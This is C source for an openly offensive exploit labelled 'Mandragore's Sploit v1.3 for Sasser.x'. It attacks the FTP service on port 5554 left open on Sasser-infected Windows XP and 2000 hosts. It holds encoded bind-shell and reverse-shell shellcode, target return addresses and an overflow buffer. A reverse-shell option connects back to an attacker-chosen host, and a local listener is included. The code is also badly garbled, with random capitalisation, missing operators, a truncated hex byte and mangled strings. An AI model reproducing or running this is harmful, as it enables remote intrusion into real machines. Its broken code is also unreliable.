#include
#include
#include
#include
#include
#define norm "/ 033 [00; 00m"
#define green "/ 033 [01; 32m"
#define Yell "/ 033 [01; 33M"
#define red "/ 033 [01; 31m"
#define banner green "[%%]" YELL "Mandragore's Sploit v1.3 for" Red "Sasser.x" NORM
#define fatal (x) {perror (x); exit (1);}
#define default_port 5554
Struct {char * OS; Long Goreg; Long LLA;
Targets [] = {
// {"OS", Go EBX or POP POP RET, GETPROCAD PTR, LOADLIB PTR},
{"wxp sp1 all", 0x77c0bf21, 0x77be10cc, 0x77be10d0},
{"W2K SP4 ALL", 0x7801D081, 0x780320cc, 0x780320d0},
}, TSZ;
Unsigned char bsh [] = {
0xEB, 0x0F, 0x8B, 0X34, 0X24, 0X33, 0XC9, 0X80, 0XC1, 0XDD, 0X80, 0X36, 0XDE, 0X46, 0XE2, 0xFA,
0xC3, 0xE8, 0XEC, 0xFF, 0xFF, 0xFF, 0xBA, 0XB9, 0X51, 0X9, 0XDE, 0XDE, 0X60, 0XDE, 0XFE, 0X9E,
0xDE, 0xB6, 0XED, 0xEC, 0XDE, 0XDE, 0XB6, 0XA9, 0XAD, 0XEC, 0X81, 0X8A, 0X21, 0XCB, 0XDA, 0XFE,
0x9e, 0xDE, 0x49, 0x47, 0x8c, 0x8c, 0x8c, 0x8c, 0x9c, 0x8c, 0x9c, 0x8c, 0x36, 0xd5, 0xde, 0xDE,
0xDE, 0x89, 0x8D, 0x9F, 0x8D, 0xB1, 0XAA, 0x9F, 0XDE, 0X89, 0X21, 0XC8, 0X21,
0x0e, 0x4d, 0xB4, 0xDE, 0XCA, 0X6A, 0X55, 0X1A, 0XB4, 0XCE, 0x8E, 0x8D, 0x36,
0xDB, 0XDE, 0XDE, 0XDE, 0XBC, 0xB7, 0X21, 0X21, 0XC8, 0X21, 0X0E, 0XB4, 0X0E, 0XB4, 0XDF,
0x8D, 0x36, 0xD9, 0xDE, 0XDE, 0XDE, 0XAA, 0XB7, 0XAD, 0XAA, 0XBB, 0X21, 0XAA, 0X89, 0X21, 0XC8,
0x21, 0x0e, 0xB4, 0xDE, 0x8A, 0x8D, 0x36, 0xD9, 0xDE, 0xDE, 0XDE, 0XBF, 0XBD, 0XBD, 0XBB, 0XAE,
0xAA, 0XDE, 0X89, 0X21, 0XC8, 0X21, 0X0E, 0x55, 0X06, 0XED, 0x1e, 0xB4, 0XCE, 0X87, 0X55, 0X22,
0x89, 0x29, 0x2d, 0x75, 0x55, 0xE2, 0xfa, 0x8e, 0x8e, 0x8e, 0xb4, 0xdf, 0x8e, 0x8e,
0x36, 0xDA, 0xDE, 0XDE, 0XDE, 0XDE, 0X8E, 0X36, 0XD1, 0x3E, 0X36, 0XD1, 0XDE, 0XDE, 0XDE, 0X9D, 0XAA, 0XBB, 0XBF, 0XAA, 0XBB, 0x8E, 0xAA, 0XB1, 0X, 0xBB, 0XAD, 0XAD, 0x9F, 0xDE, 0x18, 0xD9,
0x9a, 0x19, 0x99,0xf2,0xdf, 0xdf, 0xde, 0xde, 0x5d, 0x19, 0xe6, 0x4d, 0x75, 0x75, 0x75, 0xba,
0xB9, 0X7F, 0xEE, 0XDE, 0X55, 0X9E, 0XD2, 0X55, 0X9E, 0XC2, 0X55, 0XDE, 0X21, 0XAE, 0XD6, 0X21,
0xc8, 0x21,0x0e
}
Unsigned char RSH [] = {
0xEB, 0x0F, 0x8B, 0X34, 0X24, 0X33, 0XC9, 0X80, 0X36, 0XB6, 0X80, 0X36, 0XDE, 0X46, 0XE2, 0xFA,
0xC3, 0xE8, 0XEC, 0xFF, 0xFF, 0xFF, 0xBA, 0XB9, 0X51, 0X9, 0XDE, 0XDE, 0X60, 0XDE, 0XFE, 0X9E,
0xDE, 0xB6, 0XED, 0xEC, 0XDE, 0XDE, 0XB6, 0XA9, 0XAD, 0XEC, 0X81, 0X8A, 0X21, 0XCB, 0XDA, 0XFE,
0x9e, 0xDE, 0x49, 0x47, 0x8c, 0x8c, 0x8c, 0x8c, 0x9c, 0x8c, 0x9c, 0x8c, 0x36, 0xd5, 0xde, 0xDE,
0xDE, 0x89, 0x8D, 0x9F, 0x8D, 0xB1, 0XAA, 0x9F, 0XDE, 0X89, 0X21, 0XC8, 0X21,
0x0e, 0x4d, 0xB6, 0xa1, 0xDE, 0xDE, 0xDF, 0XCA, 0X6A, 0X55, 0X1A, 0XB4, 0XCE,
0x8e, 0x8d, 0x36, 0xD6, 0xde, 0xde, 0xde, 0xBd, 0xB1, 0xB0, 0XB0, 0XBB, 0XBD, 0XAA, 0XDE, 0X89,
0x21, 0xc8, 0x21, 0x0e, 0xB4, 0X22, 0X89, 0X55, 0X22, 0X89, 0X2D, 0X27, 0X89, 0X2D, 0X75, 0X55,
0xE2, 0xFA, 0x8E, 0x8E, 0x8E, 0xB4, 0X36, 0X8E, 0X8E, 0X36, 0XDA, 0XDE, 0XDE, 0XDE, 0XBD, 0XB3,
0xBA, 0xDE, 0x8E, 0x36, 0xD1, 0xDE, 0xDE, 0xDE, 0x9D, 0xAA, 0xBB, 0xBF, 0xAA, 0xBB, 0x8E, 0xAc,
0xB1, 0xBd, 0xBb, 0xAD, 0xAD, 0x9F, 0XDE, 0X18, 0X9, 0X9A, 0X19, 0X99, 0XF2, 0xDF, 0xDF, 0XDE,
0xDE, 0x5D, 0x19, 0xE6, 0X4D, 0X75, 0X75, 0X75, 0XBA, 0XB9, 0X7F, 0XEE, 0XDE, 0X55, 0X9E, 0XD2,
0x55, 0x9e, 0xc2, 0x55, 0xde, 0x21, 0xae, 0xD6, 0x21, 0xc8, 0x21, 0x0e
}
Char verbose = 0;
Void Setoff (Long GPa, Long LLA) {
INT GPA = GPA ^ 0xDededede, LLA = LLA ^ 0xDededE;
Memcpy (BSH 0x1D, & GPa, 4);
Memcpy (BSH 0x2e, & LLA, 4);
Memcpy (RSH 0x1D, & GPa, 4);
Memcpy (RSH 0x2e, & LLA, 4);
}
Void usage (char * argv0) {
INT I;
Printf ("% s -d
Printf ("-h undocument / n");
Printf ("-p
Printf ("-s <'bind' / 'rev'> shellcode type [default: bind] / n");
Printf ("-p
Printf ("-h
Printf ("-l setup the listener for the reverse shell / n");
Printf ("-t
Printf ("Types: / N");
For (i = 0; i Printf ("% D% S / T [0x% .8X] / N", I, Targets [i] .os, targets [i] .goreg); Exit (1); } Void shell (int S) { Char buff [4096]; int Retval; FD_SET FDS; Printf ("[ ] connected! / n / n"); For (;;) { FD_ZERO (& FDS); FD_SET (0, & fds); FD_SET (S, & FDS); IF (SELECT (S 1, & FDS, NULL, NULL, NULL) <0) Fatal ("[-] shell.select ()"); IF (fd_isset (0, & fds)) { IF ((RetVal = Read (1, BUFF, 4096)) <1) Fatal ("[-] shell.recv (stdin)); Send (S, BUFF, RETVAL, 0); } IF (fd_isset (s, & fds)) { IF ((RETVAL = RECV (S, BUFF, 4096, 0)) <1) Fatal ("[-] shell.recv (socket)"); Write (1, buff, retval); } } } Void Callback (short port) { Struct SockAddr_in sin; INT S, SLEN = 16; Sin.sin_family = 2; sin.sin_addr.s_addr = 0; Sin.sin_port = HTONS (port); s = socket (2, 1, 6); IF (Bind (S, Struct SockAddr *) & sin, 16)) { Kill (getppid (), SIGKILL); Fatal ("[-] shell.bind"); } Listen (s, 1); S = Accept (S, Struct SockAddr *) & sin, & Slen Shell (s); Printf ("CRAP / N"); } INT Main (int Argc, char ** argv, char ** env) {struct sockaddr_in sin Struct hostent * he; CHAR * Host; int port = default_port; CHAR * Host; int port = 5300; char bindopt = 1; INT I, S, PID = 0, RIP Char * buff; INT TYPE = 0; Char * jmp [] =; Printf (banner "/ n"); IF (argc == 1) USAGE (Argv [0]); For (i = 1; i IF (Strlen (Argv [i])! = 2) USAGE (Argv [0]); Switch (argv [i] [1]) { Case 'T': TYPE = ATOI (Argv [i 1]); Break; Case 'd': Host = Argv [i 1]; Break; Case 'P': Port = ATOI (Argv [i 1]) ?: Default_port; Break; Case 's': IF (strstr (Argv [i 1], "REV"))) Bindopt = 0; Break; Case 'h': Host = Argv [i 1]; Break; Case 'P': Port = ATOI (Argv [i 1]) ?: 5300; Port = port ^ 0xdede; Port = (Port & 0xFF) << 8 | Port >> 8; Memcpy (BSH 0x57, & Port, 2); Memcpy (RSH 0x5A, & Port, 2); Port = port ^ 0xdede; Port = (Port & 0xFF) << 8 | Port >> 8; Break; Case 'L': PID ; I -; Break; Case 'V': Verbose ; I -; Break; Case 'h': USAGE (Argv [0]); DEFAULT: USAGE (Argv [0]); } } IF (Verbose) Printf ("Verbose! / N"); IF ((he = gethostbyname (host) == NULL) Fatal ("[-] gethostbyname ()"); Sin.sin_family = 2; Sin.sin_addr = * (Struct In_Addr *) HE-> h_addr_list [0]); Sin.sin_port = HTONS (port); Printf ("[.] launching attack on% s:% d ../ n", inet_ntoa (* (struct in_addr *) HE-> h_addr_list [0])), port); IF (Bindopt) Printf ("[.] Will Try to Put A Bindshell on Port% D. / N", Port); Else { IF ((he = gethostbyname (host) == NULL) Fatal ("[-] gethostByname () for -h"); rip = * ((long *) he-> h_addr_list [0]); Rip = RIP ^ 0xDedededE; Memcpy (RSH 0x53, & RIP, 4); IF (PID) { Printf ("[.] setting up a listener on port% d. / n", port); PID = fork (); Switch (PID) {cas 0: Callback (port);} Else Printf ("[.] You Should Have a Listener ON% S:% D. / N", INET_NTOA (* (Struct In_ADDR *) HE-> h_addr_list [0])), port); } Printf ("[.] using type '% s' / n", targets [type] .os); / / -------------------- Core s = socket (2, 1, 6); IF (Connect (S. (Struct SockAddr *) & sin, 16)! = 0) { IF (PID) KILL (PID, SIGKILL); Fatal ("[-] connection ()"); } Printf ("[ ] Connected, Sending Exploit / N"); BUFF = (char *) Malloc (4096); Bzero (BUFF, 4096); Sprintf (BUFF, "User X / N"); Send (S, BUFF, STRLEN (BUFF), 0); RECV (S, BUFF, 4095, 0); Sprintf (BUFF, "Pass X / N"); Send (S, BUFF, STRLEN (BUFF), 0); RECV (S, BUFF, 4095, 0); MEMSET (BUFF 0000, 0X90, 2000); STRNCPY (BUFF, "Port", 5); STRCAT (BUFF, "/ X0A"); Memcpy (buff 272, JMP [0], 2); Memcpy (buff 276, & targets [type] .goreg, 4); Memcpy (buff 280, JMP [1], 5); Setoff (targets [type] .gpa, targets [type] .lla); IF (Bindopt) Memcpy (buff 300, & BSH, Strlen (BSH)); Else Memcpy (buff 300, & RSH, Strlen (RSH)); Send (S, BUFF, STRLEN (BUFF), 0); Free (BUFF); Close (s); // -------------------- End of core IF (bindopt) { Sin.sin_port = HTONS (port); Sleep (1); s = socket (2, 1, 6); IF (Connect (S, Struct SockAddr *) & Sin, 16)! = 0) Fatal ("[-] Exploit Most Likey Failed"; Shell (s); } IF (PID) WAIT (& PID); exit (0); }
